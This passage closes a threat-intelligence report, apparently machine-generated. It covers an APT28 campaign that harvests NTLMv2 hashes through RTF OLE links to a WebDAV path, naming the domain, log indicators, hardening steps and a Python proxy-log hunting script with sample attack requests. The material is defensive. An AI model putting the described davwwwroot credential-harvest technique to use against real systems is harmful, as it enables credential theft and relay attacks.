- Strip OLE objects from RTF attachments at the mail gateway, or block RTF entirely. In 2026, there is no legitimate business reason to receive weaponizable RTF documents over email. If your organization must accept RTF files, sanitize them by removing all `\object` and `\objocx` control words at the gateway.
- Hunt for prior compromise. Search proxy and DNS logs for any historical connection to wellnesscaremed[.]com between January 12 and February 6, 2026. If found, treat as confirmed credential theft: rotate all credentials for the affected user and any accounts accessible from their workstation. Check NTLM relay logs for concurrent authentication events.
- Assume a 72-hour cracking window. If exposure is confirmed and the user had a weak-to-moderate password (fewer than 14 characters, dictionary-based, or lacking complexity), assume the hash was cracked within three days and act accordingly. For passwords meeting modern complexity requirements (16+ characters, random), the window extends but relay attacks remain instantaneous.
Strategic Hardening
- Enforce SMB signing across all domain-joined systems. Even if the NTLMv2 hash cannot be cracked, it can be relayed to other services that accept NTLM. SMB signing prevents relay attacks against file shares and domain controllers.
- Deploy EPA (Extended Protection for Authentication) on all IIS/Exchange/ADFS services exposed to the internal network. EPA binds the NTLM authentication to the TLS channel, preventing relay to different services.
- Monitor for `davwwwroot` in proxy logs. Any outbound HTTP request containing `davwwwroot` in the URL path is suspicious. This string is the WebDAV trigger hint and has no legitimate use in normal web browsing.
- Audit RTF document handling in your environment. Identify all applications that auto-resolve OLE links on document open. Configure Microsoft Word via Group Policy to disable automatic link updates: `HKCU\Software\Microsoft\Office\<version>\Word\Options\DontUpdateLinks = 1`.
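The "hunt for prior compromise" action under Immediate Actions and the davwwwroot proxy-log monitoring item above reduce to the same proxy-log triage, so one added Python example covers both (it is not part of the original report). It parses constructed log lines in a simple space-separated layout that is not any particular proxy product's format, then flags three things: the C2 domain from the report, distinguishing hits inside the stated January 12 to February 6, 2026 window from later scanner-style traffic; any URL path containing davwwwroot; and WebClient-service traffic, recognisable by its Microsoft-WebDAV-MiniRedir user agent, to hosts outside an allowlist. The allowlist host and client IPs are placeholders.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Indicators from the report: the C2 domain and the window in which the report
# says any contact should be treated as confirmed credential theft.
IOC_DOMAINS = {"wellnesscaremed.com"}
CAMPAIGN_WINDOW = (datetime(2026, 1, 12, tzinfo=timezone.utc),
                   datetime(2026, 2, 6, 23, 59, 59, tzinfo=timezone.utc))
# Hosts the WebClient service is expected to talk to; constructed placeholder.
INTERNAL_WEBDAV_HOSTS = {"sharepoint.corp.example"}
WEBDAV_METHODS = {"OPTIONS", "PROPFIND"}

# Constructed proxy log in a simple layout (not a real product's format):
# <ISO timestamp> <client ip> <method> <url> <status> "<user agent>"
SAMPLE_LOG = """\
2026-01-30T08:14:02Z 10.20.5.17 OPTIONS http://wellnesscaremed.com/davwwwroot/venezia/Favorites/blank.doc 401 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-01-30T08:14:02Z 10.20.5.17 OPTIONS http://wellnesscaremed.com/davwwwroot/venezia/Favorites/blank.doc 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-01-30T08:14:03Z 10.20.5.17 PROPFIND http://wellnesscaremed.com/davwwwroot/venezia/Favorites/blank.doc 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-01-30T09:02:11Z 10.20.5.44 GET https://www.example.org/news/weather 200 "Mozilla/5.0"
2026-01-30T09:30:00Z 10.20.5.44 PROPFIND http://sharepoint.corp.example/sites/ops/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-01-31T10:05:09Z 10.20.5.23 OPTIONS http://cdn.example.net/davwwwroot/files/report.doc 401 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2026-02-20T11:00:00Z 10.20.5.90 GET http://wellnesscaremed.com/ 503 "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def parse_line(line: str):
    """Split one log line into fields; None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, src, method, url, status, ua = m.groups()
    parts = urlsplit(url)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "src": src, "method": method, "url": url, "status": int(status), "ua": ua,
            "host": (parts.hostname or "").lower(), "path": parts.path}


def classify(rec: dict) -> list:
    """Reason codes for a record; an empty list means nothing of interest."""
    reasons = []
    if rec["host"] in IOC_DOMAINS:
        in_window = CAMPAIGN_WINDOW[0] <= rec["ts"] <= CAMPAIGN_WINDOW[1]
        reasons.append("c2_domain_in_window" if in_window else "c2_domain_outside_window")
    if "davwwwroot" in rec["path"].lower():
        reasons.append("davwwwroot_path")              # WebDAV hint; no legitimate browsing use
    if (rec["method"] in WEBDAV_METHODS and "Microsoft-WebDAV-MiniRedir" in rec["ua"]
            and rec["host"] not in INTERNAL_WEBDAV_HOSTS):
        reasons.append("webclient_to_unlisted_host")   # WebClient service leaving the estate
    return reasons


def hunt(log_text: str) -> list:
    """Return one hit per interesting log line."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append({"ts": rec["ts"].isoformat(), "src": rec["src"],
                         "host": rec["host"], "reasons": reasons})
    return hits


# Contact with the C2 inside the window, or any davwwwroot fetch, means the
# client's NTLMv2 hash left the network: rotate that user's credentials.
EXPOSURE_REASONS = {"c2_domain_in_window", "davwwwroot_path"}


def exposed_workstations(hits: list) -> list:
    return sorted({h["src"] for h in hits if EXPOSURE_REASONS & set(h["reasons"])})


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["src"], h["host"], ",".join(h["reasons"]))
    print("rotate credentials for:", exposed_workstations(found))
```

The WebClient check is the one that survives infrastructure rotation: the WebDAV MiniRedir user agent talking to a host that is not one of your own WebDAV servers is the behaviour behind this technique, whatever the domain or directory name of the next campaign.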
Conclusion
This campaign demonstrates that APT28 continues to rely on NTLMv2 credential harvesting via weaponized documents as a primary initial access technique against Ukrainian government targets. The technique is not new -- CERT-UA has documented it across multiple advisories -- but it remains effective because the underlying vulnerability is architectural: Windows will automatically send NTLM credentials to any server that requests them via WebDAV, and most organizations have not deployed the GPO controls needed to prevent this.
The three simultaneous campaign directories reveal the scale of APT28's spearphishing operations. This is not a targeted one-off -- it is a parallel collection effort against Ukraine, Europe, and Turkey running from shared infrastructure with campaign tracking built into the directory structure. The operator's OPSEC failures -- the VMware development IP, the unscrubbed metadata, the target recon artifact in the Company field -- provide defenders with correlation points that extend beyond this single campaign into APT28's broader operational infrastructure.
The domain was burned in approximately 25 days. The registrar suspended it after community detection. But the technique survives the infrastructure. The next campaign will use a different domain, a different lure theme, and a different target -- but the same malformed OLE link, the same davwwwroot WebDAV path, and the same zero-interaction NTLMv2 harvest. Block outbound NTLM. Disable WebClient. Add privileged users to Protected Users. These are the controls that survive infrastructure rotation.
Case ID: apt28_c9118317-18b26784. Original analysis by BGI GHOST automated pipeline. IOCs provided for defensive use under TLP:CLEAR.
Breakglass Intelligence -- Automated threat intelligence. Zero analyst fatigue.